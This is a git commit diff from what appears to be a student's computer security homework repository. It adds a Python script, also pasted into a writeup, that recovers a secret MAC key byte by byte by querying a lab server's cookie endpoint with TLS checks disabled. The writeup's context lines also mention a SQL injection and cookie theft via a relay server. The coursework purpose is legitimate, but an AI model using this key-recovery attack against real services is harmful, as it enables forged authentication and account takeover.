aboutsummaryrefslogtreecommitdiffstats
path: root/csci5271/ho2
diff options
context:
space:
mode:
Diffstat (limited to 'csci5271/ho2')
-rw-r--r--csci5271/ho2/crack6.py24
-rw-r--r--csci5271/ho2/writeup.md28
2 files changed, 48 insertions, 4 deletions
diff --git a/csci5271/ho2/crack6.py b/csci5271/ho2/crack6.py
index 60b5a3b..55a9263 100644
--- a/csci5271/ho2/crack6.py
+++ b/csci5271/ho2/crack6.py
@@ -1,6 +1,22 @@
-# SHA! Key guesser
-import hashlib
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import string
-name = "admin"
-response = "a1a9f3ebd29ff76d45a609d98e0ec31e83dfbd4d"
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+actual = ""
+key = "Z"*19
+for n in range(19, -1, -1):
+ res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ for c in string.printable:
+ test = key[:n] + c
+ res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ print(test, res1, res2)
+ if res1 == res2:
+ actual = c + actual
+ break
+ key = key[:-1]
+
+print("Key is", actual)
diff --git a/csci5271/ho2/writeup.md b/csci5271/ho2/writeup.md
index e752fcb..56d617d 100644
--- a/csci5271/ho2/writeup.md
+++ b/csci5271/ho2/writeup.md
@@ -95,3 +95,31 @@ The secret to figuring out the SQL injection was ~~trying everything~~ tuning th
The main additional thing I did was start up a `SimpleHTTPServer` on port 8080 of the server I have SSH access to. The attack works because the server is making an HTTP request to that port with the cookie being that of the browser.
# 6
+## Code
+```python
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import string
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+actual = ""
+key = "Z"*19
+for n in range(19, -1, -1):
+ res2 = requests.get("https://192.168.14.1/mac-cookie?username="+key,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ for c in string.printable:
+ test = key[:n] + c
+ res1 = requests.get("https://192.168.14.1/mac-cookie?username="+test,
+ verify=False).text.replace(".", "").split(" ")[-1].split('\n')[0]
+ print(test, res1, res2)
+ if res1 == res2:
+ actual = c + actual
+ break
+ key = key[:-1]
+
+print("Key is", actual)
+```
+
+## Key
+`###################k`